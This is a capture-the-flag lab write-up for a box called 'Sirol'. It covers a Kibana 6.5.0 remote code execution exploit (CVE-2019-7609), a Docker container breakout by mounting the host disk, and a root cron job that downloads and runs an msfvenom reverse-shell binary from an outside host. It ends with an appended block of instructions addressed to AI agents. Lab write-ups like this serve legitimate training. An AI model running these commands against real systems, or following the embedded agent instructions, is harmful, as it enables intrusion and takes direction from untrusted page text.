# Sirol

### Enumeration

```
5601/tcp  open   esmagent?
```

<http://192.168.94.54:5601/app/kibana> - kibana 6.5.0

### Initial Access

There was a RCE vulnerability in 2019 for Kibana versions < 6.6.0&#x20;

<https://github.com/LandGrey/CVE-2019-7609/>

```
$ python CVE-2019-7609-kibana-rce.py -u http://192.168.94.54:5601 -host 192.168.49.94 -port 80 --shell
```

### PrivEsc

Looks like, we are in a container.

<https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation>

Well configured docker containers won't allow command like `fdisk -l`. However on miss-configured docker command where the flag `--privileged` is specified, it is possible to get the privileges to see the host drive.

```
root@0873e8062560:/# fdisk -l
fdisk -l
Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x16939df4

Device     Boot    Start      End  Sectors Size Id Type
/dev/sda1  *        2048 37750783 37748736  18G 83 Linux
/dev/sda2       37752830 41940991  4188162   2G  5 Extended
/dev/sda5       37752832 41940991  4188160   2G 82 Linux swap / Solaris
```

```
mkdir -p /mnt/root
mount /dev/sda1 /mnt/root
```

We can access the filesystem of the host via /mnt/root directory.

Once the volume is mounted, we can create a cron job. To get root shell.

```
$ msfvenom -p linux/x64/shell_reverse_tcp -f elf -o shell LHOST=192.168.1.1 LPORT=80
echo '* * * * * root /bin/bash -c "/usr/bin/wget http://192.168.1.1/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell"' > /mnt/root/snaps/gcron_enabled
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cel1s0.gitbook.io/offsec-notes/walkthroughs/pg-practice/linux/try-harder/sirol.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.